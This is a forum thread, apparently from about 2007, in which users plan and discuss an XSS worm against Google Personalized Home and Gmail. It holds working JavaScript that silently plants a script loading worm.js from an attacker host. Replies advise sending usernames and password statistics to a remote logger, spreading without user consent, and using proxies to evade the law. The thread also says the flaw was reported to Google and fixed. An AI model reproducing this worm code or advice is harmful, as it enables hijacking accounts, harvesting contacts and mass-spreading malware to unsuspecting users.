I going to write a benign, non-malicious XSS Worm which target on a website.

Here is the background:
I already found out a persistent XSS, but that XSS is located on private page of user, no other user can access that page.
I have another reflective XSS which is located on public page.
I can get the email contact list of infected user and send email to others from infected user email account.

What functionalities should the worm has? Any suggestion?

- Hong

It could send the username to a remote logging place which timestamps every log. This way you can see the growth rate. If it can read the password it could also send out stats about the password (such as its length and if it passes various regexes to test it's strength).

You wouldn't need to build a logging thing, just use ccl.whiteacid.org, that will automatically also log the user agent, browser IP and referer and yes, it will timestamp each entry.

I don't know if logging the email would do much good.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Perhaps log where the e-mail is hosted at, the domain and the servers name.

- Kyran

I will try to use ccl.whiteacid.org to bulid the logging system.

But I still have some questions.
Should it collect any private data?
Should it notice users that they are infected by worm?
Should it spread itself without user permit?

I know all questions doesn't make sense, but the target site is one of the biggest site in the world, it provides email and many other services, it has a huge amount of users. Though it needs social engineering to spread it, I think it can be infect lot of users, I really don't want to scare anyone. I want to make the worm as benign as possible.

- Hong

Personally I think it should be as realistic as possible except for that it shouldn't actually cause any damage (besides the small cost of bandwidth etc). So it should not collect private data such as their real name, address, email address etc. Collecting something such as their email host could be useful though (eg just the part after the @). Collecting stuff like their user agent and their username should be fine too. As for noticing that the user has already been infected. I don't think the user should discriminate in that way. If you log the username then you'd be able to later count the number of users that were "infected" more than once.

As for spreading without interaction. As I said earlier it should try to be as realistic as possible, a real worm would not require user interaction unless it had to.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Be very careful Hong! Remember what happened to Samy even though his worm had no malicious intent in the design. As RSnake's said before, if folks come asking for logs with subpoenas, there's not much he can do (uhh, at least, I think he said that before, but this hasn't been my week, so maybe I'm mis-remembering). Even if you have the best intentions in the world, I'd be extremely wary of considering something like this.

Of course, if it requires user-interaction then the growth rate should certainly be limited and whomever the site is shouldn't be dos'ed as a result, but you never know.

Just being purely selfish, we don't want to lose your contributions here because you get busted and can't access the internet outside of work! ;-)

No, that's absolutely correct. Be legal, or be-ware. :) It's not that I want to give up logs, but I'm also realistic about the law. So use proxies, fake everything and don't tell me about it if you want to be safe (not telling anyone about a crime is a good rule of thumb anyway).

- RSnake
Gotta love it. http://ha.ckers.org

Thanks.
Yes, I want to stay out of jail, and I don't want to do any crime.

Now my worm has some simple functions(i.e hijack links, forms, read contact list,etc).
I think I won't publish the worm, and inform the company their holes.

Maybe I capture some screenshots and post it later. :)

- Hong

cool hong. Try to anonymize as much as possible, but be careful ya.

http://hackathology.blogspot.com

Here is the detail of the persistent XSS Vuln:
In Google Personalized Home, the Bookmarks gadget has a persistent XSS Vuln, the name of URI doesn't sanitize < and >, and it places inside a script tag, then we can insert a xss payload using --></script><script>XSS</script>.
All Bookmarks are saved on Google server.

Google Personalized Home is a private page, that means you need another Google XSS to insert the persistent XSS, a reflective XSS is enough. To add XSS payload to Google Personalized Home, it can using the following code snippet.

function infect()
{
var fx= f2.document.getElementsByTagName("form");
for (var i=0; i<fx.length;i++)
{
var act = fx.action;
if(act.indexOf("/bookmarks/mark") != -1)
{
fx.bkmk.value="http://www.attacker.org";
fx.title.value="--></script><script src=http://www.attacker.org/worm.js></script>";
fx.labels.value="homepage";
fx.onsubmit();
fx.submit();
location.href='http://www.google.com/ig';
break;
}
}
}

function install()
{
document.body.innerHTML+="<iframe name='f2' style='width:0px;height:0px;border:0px' src='http://www.google.com/ig' onLoad='infect()'></iframe>";
}

function addBookmarksGadget()
{
var f= f1.document.advd;
f.url.value="http://www.google.com/ig/modules/bookmarks.xml";
f.onsubmit();
f.url.value="http://www.google.com/ig/modules/builtin_bookmarks.xml"
f.onsubmit();
setTimeout('install()',1000);
}

document.body.innerHTML+="<iframe name='f1' style='width:0px;height:0px;border:0px' src='/ig/directory?root=/ig&dpos=top' onLoad='addBookmarksGadget()'></iframe>";


Because Bookmarks gadget has a size limit when adding bookmark, it uses Google Bookmarks to add bookmark. After added bookmark, every time infected user sign in and go to his Google Personalized Home, the worm.js will be download and execute.

I wrote a simple benign worm, I call it GWorm, Here is some screenshots
The source code of XSS inside Bookmarks gadget
http://yathong.googlepages.com/GWorm1.jpg
Different theme on Google Personalized Home
http://yathong.googlepages.com/GWorm17.jpg
http://yathong.googlepages.com/GWorm11.jpg
http://yathong.googlepages.com/GWorm14.jpg
http://yathong.googlepages.com/GWorm16.jpg
Hijack all hyperlinks
http://yathong.googlepages.com/GWorm10.jpg
http://yathong.googlepages.com/GWorm6.jpg
Hijack all forms
http://yathong.googlepages.com/GWorm3.jpg

GWorm also reads contact list, and it can send email to anyone from infected user gmail.

I had already sent a email to google a week ago(29/3), and they replied me two email on the same day.

Edited: One of the mail replied from google was not auto-reply and a fix is currently being worked.

- Hong



Edited 1 time(s). Last edit at 04/06/2007 01:48PM by Hong.

wow.

very interesting work, hong.

[No sooner does man discover intelligence than he tries to involve it in his own stupidity.]
[Jaques Cousteau]

It seems to be fixed.

too profound for me to understand. But nice work Hong

http://hackathology.blogspot.com